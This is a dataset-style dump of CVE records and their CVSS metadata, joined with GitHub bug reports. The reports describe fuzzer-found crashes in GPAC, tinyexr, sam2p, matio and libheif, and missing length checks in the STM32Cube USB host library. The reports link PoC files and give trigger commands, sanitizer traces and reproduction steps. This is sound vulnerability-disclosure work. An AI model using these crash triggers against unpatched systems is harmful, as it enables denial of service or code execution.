Hi, Our fuzzer found a crash on MP4Box (the latest commit `987169b` on master) due to a null pointer dereference bug on function ilst_item_Read (box_code_apple.c:119). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_npd_ilst_item_Read Command: MP4Box -info $PoC ~~~ [iso file] Read Box type data (0x64617461) at position 32034 has size 0 but is not at root/file level, skipping ==18913== Invalid read of size 8 ==18913== at 0xF69508: ilst_item_Read (box_code_apple.c:119) ==18913== by 0x818970: gf_isom_box_read (box_funcs.c:1528) ==18913== by 0x818970: gf_isom_box_parse_ex (box_funcs.c:208) ==18913== by 0xF68BEA: ilst_Read (box_code_apple.c:47) ==18913== by 0x818970: gf_isom_box_read (box_funcs.c:1528) ==18913== by 0x818970: gf_isom_box_parse_ex (box_funcs.c:208) ==18913== by 0x819EEB: gf_isom_box_array_read_ex (box_funcs.c:1419) ==18913== by 0xFE4AC8: meta_Read (box_code_meta.c:128) ==18913== by 0x818970: gf_isom_box_read (box_funcs.c:1528) ==18913== by 0x818970: gf_isom_box_parse_ex (box_funcs.c:208) ==18913== by 0x819EEB: gf_isom_box_array_read_ex (box_funcs.c:1419) ==18913== by 0xFB433D: udta_Read (box_code_base.c:7998) ==18913== by 0x818970: gf_isom_box_read (box_funcs.c:1528) ==18913== by 0x818970: gf_isom_box_parse_ex (box_funcs.c:208) ==18913== by 0x819EEB: gf_isom_box_array_read_ex (box_funcs.c:1419) ==18913== by 0xF8F40C: moov_Read (box_code_base.c:3751) ==18913== Address 0x8 is not stack'd, malloc'd or (recently) free'd Segmentation fault ~~~ ASAN says: ~~~ [iso file] Read Box type data (0x64617461) at position 32034 has size 0 but is not at root/file level, skipping /home/dungnguyen/gueb-testing/gpac-head/src/isomedia/box_code_apple.c:119:26: runtime error: member access within null pointer of type 'struct GF_Box' ~~~ Thanks, Manh Dung
Runtime error: member access within null pointer of type 'struct GF_Box'
https://api.github.com/repos/gpac/gpac/issues/1263/comments
1
2019-07-05T22:47:55Z
2019-07-07T15:57:03Z
https://github.com/gpac/gpac/issues/1263
464,790,539
1,263
2,228
CVE-2020-19490
2021-07-21T18:15:08.993
tinyexr 0.9.5 has a integer overflow over-write in tinyexr::DecodePixelData in tinyexr.h, related to OpenEXR code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/commit/a685e3332f61cd4e59324bf3f669d36973d64270" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/commit/a685e3332f61cd4e59324bf3f669d36973d64270" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/124" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinyexr_project:tinyexr:0.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "6839BA33-4B4D-413F-8E81-0C4F9784EBBB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/syoyo/tinyexr/issues/124
[ "Exploit", "Third Party Advisory" ]
github.com
[ "syoyo", "tinyexr" ]
Hi, Our fuzzer found a crash on tinyexr (the latest commit `2a5eac4` on master). I use your command to compile tinyexr as mentioned in [#101](https://github.com/syoyo/tinyexr/issues/101) (clang++ version 4.0.0, Ubuntu 16.04 64 bit). PoC: https://github.com/strongcourage/PoCs/blob/master/tinyexr_2a5eac4/PoC_iw_DecodePixelData Command: test_tinyexr $POC Valgrind says: ~~~ ==4577== Invalid write of size 4 ==4577== at 0x4425B2: tinyexr::DecodePixelData(unsigned char**, int const*, unsigned char const*, unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, _EXRAttribute const*, unsigned long, _EXRChannelInfo const*, std::vector<unsigned long, std::allocator<unsigned long> > const&) [clone .isra.213] (tinyexr.h:9995) ==4577== by 0x447CD8: tinyexr::DecodeChunk(_EXRImage*, _EXRHeader const*, std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const*, unsigned long, std::string*) [clone .constprop.327] (tinyexr.h:10993) ==4577== by 0x44C273: DecodeEXRImage (tinyexr.h:11190) ==4577== by 0x44C273: LoadEXRImageFromMemory (tinyexr.h:11723) ==4577== by 0x44D3A7: LoadEXRImageFromFile (tinyexr.h:11700) ==4577== by 0x47B756: LoadEXR (tinyexr.h:11260) ==4577== by 0x4022C2: main (test_tinyexr.cc:130) ==4577== Address 0xffffff4005b1e960 is not stack'd, malloc'd or (recently) free'd ~~~ ASAN says: ~~~ tinyexr.h:10958:48: runtime error: signed integer overflow: 2147483647 + 1 cannot be represented in type 'int' SUMMARY: AddressSanitizer: undefined-behavior tinyexr.h:10958:48 in tinyexr.h:10961:39: runtime error: signed integer overflow: -2147483648 - 2147483647 cannot be represented in type 'int' SUMMARY: AddressSanitizer: undefined-behavior tinyexr.h:10961:39 in ASAN:DEADLYSIGNAL ================================================================= ==31934==ERROR: AddressSanitizer: SEGV on unknown address 0x6070000001c0 (pc 0x0000005de035 bp 0x7ffe6323ce30 sp 0x7ffe6323c380 T0) ==31934==The signal is caused by a WRITE memory access. #0 0x5de034 in tinyexr::DecodePixelData(unsigned char**, int const*, unsigned char const*, unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, _EXRAttribute const*, unsigned long, _EXRChannelInfo const*, std::vector<unsigned long, std::allocator<unsigned long> > const&) /home/dungnguyen/gueb-testing/tinyexr-asan/./tinyexr.h:9995:22 #1 0x5b64fd in tinyexr::DecodeChunk(_EXRImage*, _EXRHeader const*, std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const*, unsigned long, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /home/dungnguyen/gueb-testing/tinyexr-asan/./tinyexr.h:10984:20 #2 0x585b35 in tinyexr::DecodeEXRImage(_EXRImage*, _EXRHeader const*, unsigned char const*, unsigned char const*, unsigned long, char const**) /home/dungnguyen/gueb-testing/tinyexr-asan/./tinyexr.h:11190:15 #3 0x5826fe in LoadEXRImageFromMemory /home/dungnguyen/gueb-testing/tinyexr-asan/./tinyexr.h:11722:10 #4 0x5689e1 in LoadEXRImageFromFile /home/dungnguyen/gueb-testing/tinyexr-asan/./tinyexr.h:11699:10 #5 0x55de1e in LoadEXR /home/dungnguyen/gueb-testing/tinyexr-asan/./tinyexr.h:11260:15 #6 0x5bd092 in main /home/dungnguyen/gueb-testing/tinyexr-asan/test_tinyexr.cc:130:13 #7 0x7fdba826082f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #8 0x41b878 in _start (/home/dungnguyen/PoCs/tinyexr_2a5eac4/test_tinyexr-asan+0x41b878) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/dungnguyen/gueb-testing/tinyexr-asan/./tinyexr.h:9995:22 in tinyexr::DecodePixelData(unsigned char**, int const*, unsigned char const*, unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, _EXRAttribute const*, unsigned long, _EXRChannelInfo const*, std::vector<unsigned long, std::allocator<unsigned long> > const&) ==31934==ABORTING ~~~ Thanks, Manh Dung
Crash on DecodePixelData
https://api.github.com/repos/syoyo/tinyexr/issues/124/comments
0
2019-07-07T06:43:59Z
2019-07-07T07:59:09Z
https://github.com/syoyo/tinyexr/issues/124
464,920,962
124
2,229
CVE-2020-19491
2021-07-21T18:15:09.030
There is an invalid memory access bug in cgif.c that leads to a Segmentation fault in sam2p 0.49.4. A crafted input will lead to a denial of service or possibly unspecified other impact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pts/sam2p/commit/1d62cf8964bfcafa6561c4c3bb66d4aa4c529a73" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pts/sam2p/issues/67" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pts/sam2p/commit/1d62cf8964bfcafa6561c4c3bb66d4aa4c529a73" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pts/sam2p/issues/67" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sam2p_project:sam2p:0.49.4:*:*:*:*:*:*:*", "matchCriteriaId": "EE79927B-648D-46F8-ACDF-5E96440FDD02", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/pts/sam2p/issues/67
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pts", "sam2p" ]
Hi, I found a crash in the function CGIF::AddExtensionBlock on the latest commit `cafd4b8` of master. It seems that it is due to an incomplete patch of [#36](https://github.com/pts/sam2p/issues/36). PoC: https://github.com/strongcourage/PoCs/blob/master/sam2p_cafd4b8/PoC_segv Command: sam2p $PoC /tmp/out.bmp ASAN says: ~~~ ==29941==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x000000428586 bp 0x7fff8308aaa0 sp 0x7fff8308aa70 T0) #0 0x428585 in CGIF::AddExtensionBlock(CGIF::SavedImage*, int, unsigned char*) /home/dungnguyen/gueb-testing/sam2p/cgif.c:470 #1 0x42e9df in CGIF::DGifSlurp(CGIF::GifFileType*) /home/dungnguyen/gueb-testing/sam2p/cgif.c:1554 #2 0x42ec04 in in_gif_reader /home/dungnguyen/gueb-testing/sam2p/in_gif.cpp:60 #3 0x491694 in Image::load(Image::Loader::UFD*, SimBuffer::Flat const&, char const*) /home/dungnguyen/gueb-testing/sam2p/image.cpp:1435 #4 0x4095f3 in run_sam2p_engine(Files::FILEW&, Files::FILEW&, char const* const*, unsigned char) /home/dungnguyen/gueb-testing/sam2p/sam2p_main.cpp:1055 #5 0x40a73e in main /home/dungnguyen/gueb-testing/sam2p/sam2p_main.cpp:1148 #6 0x7f4e3c42082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x401fa8 in _start (/home/dungnguyen/PoCs/sam2p_cafd4b8/sam2p-asan+0x401fa8) ~~~ Thanks, Manh Dung
SEGV in CGIF::AddExtensionBlock (cgif.c:470)
https://api.github.com/repos/pts/sam2p/issues/67/comments
2
2019-07-18T11:15:24Z
2021-07-27T10:12:51Z
https://github.com/pts/sam2p/issues/67
469,711,369
67
2,230
CVE-2020-19497
2021-07-21T18:15:09.097
Integer overflow vulnerability in Mat_VarReadNextInfo5 in mat5.c in tbeu matio (aka MAT File I/O Library) 1.5.17, allows attackers to cause a Denial of Service or possibly other unspecified impacts.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tbeu/matio/commit/5fa49ef9fc4368fe3d19b5fdaa36d8fa5e7f4606" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/tbeu/matio/issues/121" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tbeu/matio/commit/5fa49ef9fc4368fe3d19b5fdaa36d8fa5e7f4606" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/tbeu/matio/issues/121" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:matio_project:matio:1.5.17:*:*:*:*:*:*:*", "matchCriteriaId": "BA202CA9-93FA-4D2E-8968-0A2748AC055D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/tbeu/matio/issues/121
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "tbeu", "matio" ]
Hi, I found a crash in mat5.c:4983 (the latest commit `bcf0447` on master). PoC: https://github.com/strongcourage/PoCs/blob/master/matio_bcf0447/PoC_segv_Mat_VarReadNextInfo5 Command: matdump $PoC ASAN says: ~~~ ==17186==ERROR: AddressSanitizer: SEGV on unknown address 0x60210000efcf (pc 0x7ff5bd4a42ce bp 0x7ffd873b9460 sp 0x7ffd873b9230 T0) #0 0x7ff5bd4a42cd in Mat_VarReadNextInfo5 ../../src/mat5.c:4983 #1 0x7ff5bd4b8c57 in Mat_VarReadNextInfo ../../src/mat.c:2311 #2 0x408122 in main ../../tools/matdump.c:942 #3 0x7ff5bcc9a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x401b78 in _start (/home/dungnguyen/PoCs/matio_bcf0447/.libs/lt-matdump+0x401b78) ~~~ Thanks, Manh Dung
SEGV in mat5.c:4983
https://api.github.com/repos/tbeu/matio/issues/121/comments
2
2019-07-27T07:03:07Z
2021-07-26T18:09:11Z
https://github.com/tbeu/matio/issues/121
473,607,751
121
2,231
CVE-2020-19499
2021-07-21T18:15:09.167
An issue was discovered in heif::Box_iref::get_references in libheif 1.4.0, allows attackers to cause a Denial of Service or possibly other unspecified impact due to an invalid memory read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/strukturag/libheif/commit/f7399b62d7fbc596f1b2871578c1d2053bedf1dd" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/strukturag/libheif/issues/138" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/strukturag/libheif/commit/f7399b62d7fbc596f1b2871578c1d2053bedf1dd" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/strukturag/libheif/issues/138" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libheif:1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "6F0C81ED-3820-41B5-8DB0-36E2BC6D993C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/strukturag/libheif/issues/138
[ "Exploit", "Third Party Advisory" ]
github.com
[ "strukturag", "libheif" ]
Hi, I found a bug on the latest commit fd0c01d on master. PoC: https://github.com/strongcourage/PoCs/blob/master/libheif_fd0c01d/PoC_segv_box.cc:2408 Command: examples/heif-convert $PoC /tmp/out.png ASAN says: ~~~ ==16874==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000050 (pc 0x00000048143c bp 0x7ffc1ade73a0 sp 0x7ffc1ade7370 T0) #0 0x48143b in std::vector<heif::Box_iref::Reference, std::allocator<heif::Box_iref::Reference> >::begin() const /usr/include/c++/5/bits/stl_vector.h:557 #1 0x475604 in heif::Box_iref::get_references(unsigned int, unsigned int) const ../../libheif/box.cc:2408 #2 0x4293b6 in heif::HeifContext::get_id_of_non_virtual_child_image(unsigned int, unsigned int&) const ../../libheif/heif_context.cc:816 #3 0x42979a in heif::HeifContext::Image::get_luma_bits_per_pixel() const ../../libheif/heif_context.cc:839 #4 0x40c1a4 in heif_image_handle_get_luma_bits_per_pixel ../../libheif/heif.cc:455 #5 0x4060fc in main ../../examples/heif_convert.cc:209 #6 0x7f1ac522d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x404f68 in _start (/home/dungnguyen/PoCs/libheif_fd0c01d/heif-convert-asan+0x404f68) ~~~ Thanks, Manh Dung
SEGV in box.cc:2408
https://api.github.com/repos/strukturag/libheif/issues/138/comments
2
2019-07-28T00:11:00Z
2021-07-26T15:04:36Z
https://github.com/strukturag/libheif/issues/138
473,690,024
138
2,232
CVE-2021-34259
2021-07-22T20:15:08.150
A buffer overflow vulnerability in the USBH_ParseCfgDesc() function of STMicroelectronics STM32Cube Middleware v1.8.0 and below allows attackers to execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/STMicroelectronics/STM32CubeH7/issues/76" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/STMicroelectronics/STM32CubeH7/issues/76" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:st:stm32cube_middleware:*:*:*:*:*:*:*:*", "matchCriteriaId": "11CDA8A4-121C-4623-ABA4-7546AB3F1406", "versionEndExcluding": null, "versionEndIncluding": "1.8.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:st:stm32h7b3:-:*:*:*:*:*:*:*", "matchCriteriaId": "95A1906D-8E90-492C-9A9A-E81DDD6AF587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "120" ]
120
https://github.com/STMicroelectronics/STM32CubeH7/issues/76
[ "Exploit", "Third Party Advisory" ]
github.com
[ "STMicroelectronics", "STM32CubeH7" ]
**Describe the set-up** - Software: - STM32Cube MCU & MPU Packages - Version: - STM32Cube_FW_H7_V1.8.0 - Verification Hardware Platform: - STM32H7B3 **Describe the bug** - Function: - static void USBH_ParseCfgDesc(USBH_CfgDescTypeDef *cfg_desc, uint8_t *buf, uint16_t length) - Location: - https://github.com/STMicroelectronics/STM32CubeH7/blob/79196b09acfb720589f58e93ccf956401b18a191/Middlewares/ST/STM32_USB_Host_Library/Core/Src/usbh_ctlreq.c#L395 - Type: - Buffer Overflow - Result: - The system could be configured incorrectly with wrong parameters. - Description: - The function USBH_ParseCfgDesc() parses the configuration descriptor, interface descriptor, and endpoint descriptor by input data from a USB device. - However, it doesn’t check the validity of the variable cfg_desc->wTotalLength compared with the total length of the input buffer as shown in https://github.com/STMicroelectronics/STM32CubeH7/blob/79196b09acfb720589f58e93ccf956401b18a191/Middlewares/ST/STM32_USB_Host_Library/Core/Src/usbh_ctlreq.c#L395. This will cause the following program including calling to the function USBH_GetNextDesc(), USBH_ParseInterfaceDesc() and USBH_ParseEPDesc() configure the system incorrectly. **How To Reproduce** 1. Running MSC_Standalone application on the STM32H7B3I platform 2. Plug a USB disk 3. Use the attached Bug2.txt to replace the USB device packet. [Bug2.txt](https://github.com/STMicroelectronics/STM32CubeH7/files/5381225/Bug2.txt) **Additional context** - To patch it, the program should check if reach the end of the input buffer when plus cfg_desc->wTotalLength.
No validity checking on the variable cfg_desc->wTotalLength
https://api.github.com/repos/STMicroelectronics/STM32CubeH7/issues/76/comments
3
2020-10-14T22:38:58Z
2022-03-14T16:26:11Z
https://github.com/STMicroelectronics/STM32CubeH7/issues/76
721,840,891
76
2,233
CVE-2021-34260
2021-07-22T20:15:08.183
A buffer overflow vulnerability in the USBH_ParseInterfaceDesc() function of STMicroelectronics STM32Cube Middleware v1.8.0 and below allows attackers to execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/STMicroelectronics/STM32CubeH7/issues/83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/STMicroelectronics/STM32CubeH7/issues/83" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:st:stm32cube_middleware:*:*:*:*:*:*:*:*", "matchCriteriaId": "11CDA8A4-121C-4623-ABA4-7546AB3F1406", "versionEndExcluding": null, "versionEndIncluding": "1.8.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:st:stm32h7b3:-:*:*:*:*:*:*:*", "matchCriteriaId": "95A1906D-8E90-492C-9A9A-E81DDD6AF587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "120" ]
120
https://github.com/STMicroelectronics/STM32CubeH7/issues/83
[ "Exploit", "Third Party Advisory" ]
github.com
[ "STMicroelectronics", "STM32CubeH7" ]
**Describe the set-up** - Software: - STM32Cube MCU & MPU Packages - Version: - STM32Cube_FW_H7_V1.8.0 - Verification Hardware Platform: - STM32H7B3 **Describe the bug** - Function: - static void USBH_ParseInterfaceDesc(USBH_InterfaceDescTypeDef *if_descriptor, uint8_t *buf) - Location: - https://github.com/STMicroelectronics/STM32CubeH7/blob/79196b09acfb720589f58e93ccf956401b18a191/Middlewares/ST/STM32_USB_Host_Library/Core/Src/usbh_ctlreq.c#L444 - Type: - Buffer Overflow - Result: - The system could be configured incorrectly with wrong parameters. - Description: - The function USBH_ParseInterfaceDesc() parse interface descriptor. It’s called by the function USBH_ParseCfgDesc() as shown in https://github.com/STMicroelectronics/STM32CubeH7/blob/79196b09acfb720589f58e93ccf956401b18a191/Middlewares/ST/STM32_USB_Host_Library/Core/Src/usbh_ctlreq.c#L413. - It doesn’t check the validity of the variable if_descriptor->bLength compared with the total length of the input buffer which may cause a buffer overflow by the following called function USBH_GetNextDesc() as shown in https://github.com/STMicroelectronics/STM32CubeH7/blob/79196b09acfb720589f58e93ccf956401b18a191/Middlewares/ST/STM32_USB_Host_Library/Core/Src/usbh_ctlreq.c#L419. **How To Reproduce** 1. Running MSC_Standalone application on the STM32H7B3I platform 2. Plug a USB disk 3. Use the attached Bug9.txt to replace the USB device packet. [Bug9.txt](https://github.com/STMicroelectronics/STM32CubeH7/files/5381357/Bug9.txt) **Additional context** - To patch it, the program should check if reach the end of the input buffer when plus if_descriptor->bLength.
Buffer Overflow due to the variable if_descriptor->bLength
https://api.github.com/repos/STMicroelectronics/STM32CubeH7/issues/83/comments
2
2020-10-14T23:17:15Z
2022-03-14T16:27:28Z
https://github.com/STMicroelectronics/STM32CubeH7/issues/83
721,855,759
83
2,234
CVE-2021-34262
2021-07-22T20:15:08.253
A buffer overflow vulnerability in the USBH_ParseEPDesc() function of STMicroelectronics STM32Cube Middleware v1.8.0 and below allows attackers to execute arbitrary code.
